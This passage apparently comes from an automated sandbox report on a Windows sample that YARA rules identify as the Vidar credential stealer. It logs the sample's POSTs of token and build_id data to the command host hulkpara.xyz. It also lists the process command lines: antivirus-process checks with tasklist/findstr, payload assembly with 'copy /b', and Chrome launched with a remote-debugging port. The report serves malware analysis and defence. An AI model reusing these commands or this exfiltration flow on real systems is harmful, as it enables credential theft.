Date: Thu, 19 Dec 2024 07:14:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:14:12 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.7  49855        52.168.117.168  443               1504  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-19 07:14:11 UTC  1044  OUT  POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597974994&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 11963
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-19 07:14:11 UTC  11963  OUT  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-19T08:46:14.993Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
2024-12-19 07:14:12 UTC  894  IN  HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=59114fc5417240e587156b557c02680f&HASH=5911&LV=202412&V=4&LU=1734592451673; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=a843b9aae7d2422282f82cf366ddb064; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5523321
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:11 GMT
                                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 49856 | 52.168.117.168 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:11 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597975005&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 33333
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-19 07:14:11 UTC | 16384 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-19T08:46:15.003Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
2024-12-19 07:14:11 UTC | 16384 | OUT | Data Ascii: tatic":false,"name":"default","ocid":"msedgdhp","product":"anaheim","type":"dhp","url":"https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&ocid=msedgdhp","viewType":"size3column","theme":"lig
2024-12-19 07:14:11 UTC | 565 | OUT | Data Ascii: 1.0":{"type":"o","spans":{"network":[16369,2527]}},"[cdn]/staticsb/statics/latest/brand/new-msn-logo-color-black.svg":{"type":"o","spans":{"network":[19371,333]},"durations":{"connect":9,"request":324,"cdnTCP":315,"cdnSelf":1,"cdnOrigin":0},"scalars":{"si
2024-12-19 07:14:12 UTC | 894 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=91c081d786564e3e800c6af1b87ad72f&HASH=91c0&LV=202412&V=4&LU=1734592452287; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:12 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=144a644c99c040f2a33d31b82a2787c0; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:12 GMT; Path=/;Secure; SameSite=None
time-delta-millis: -5522718
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Thu, 19 Dec 2024 07:14:12 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 49859 | 52.168.117.168 | 443 | 1504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:12 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597975825&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5417
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; msnup=
2024-12-19 07:14:12 UTC | 5417 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-19T08:46:15.823Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
2024-12-19 07:14:12 UTC | 894 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=1aac42bfd96c4ff4b61c9655a5f0dc53&HASH=1aac&LV=202412&V=4&LU=1734592452548; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:12 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=392bbc3d3b444fb894be47bc7a72dd54; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5523277
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
41          192.168.2.7  49860        52.168.117.168  443               1504  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-19 07:14:12 UTC  1033  OUT  POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597976003&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 9827
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; msnup=
2024-12-19 07:14:12 UTC  9827  OUT  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-19T08:46:16.002Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"loca
2024-12-19 07:14:13 UTC  894  IN  HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=379a0263ac9a4ae0926f082c248cb6d5&HASH=379a&LV=202412&V=4&LU=1734592452672; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=fbe455c57fa040679a9db6f3e18673d6; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5523331
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
42          192.168.2.7  49863        94.130.191.168  443               7416  C:\Users\user\AppData\Local\Temp\325114\Miniature.com

Timestamp  Bytes transferred  Direction  Data
2024-12-19 07:14:14 UTC  326  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 98329
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:14:14 UTC  16355  OUT  Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZCJMOPPPH4EUAIEK6PHLCont
2024-12-19 07:14:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:15 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:14:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 49865 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:17 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JWTR1VSJEKF37YUA168G
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:14:17 UTC | 331 | OUT | Data Ascii: ------JWTR1VSJEKF37YUA168GContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------JWTR1VSJEKF37YUA168GContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JWTR1VSJEKF37YUA168GCont
2024-12-19 07:14:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:18 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:14:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49868 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:14:19 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:14:19 UTC | 331 | OUT | Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------2DTJEUS2DTRQQIMOZMYMCont
2024-12-19 07:14:20 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:20 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:14:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0



                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                          Start time:02:12:51
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\pM3fQBuTLy.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          File size:899'095 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:C5F715F9EEFA5E42FD10FC3B6E90953B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                          Start time:02:12:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd
                                                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                          Start time:02:12:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:02:12:55
Start date:19/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xbc0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:02:12:55
Start date:19/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x3c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:02:12:56
Start date:19/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xbc0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:02:12:56
Start date:19/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x3c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:02:12:57
Start date:19/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 325114
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:02:12:57
Start date:19/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "Grocery" Pink
Imagebase:0x3c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:02:12:57
Start date:19/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:02:12:57
Start date:19/12/2024
Path:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Wow64 process (32bit):true
Commandline:Miniature.com d
Imagebase:0xc10000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                          Start time:02:12:57
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                          Start time:03:45:37
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:23
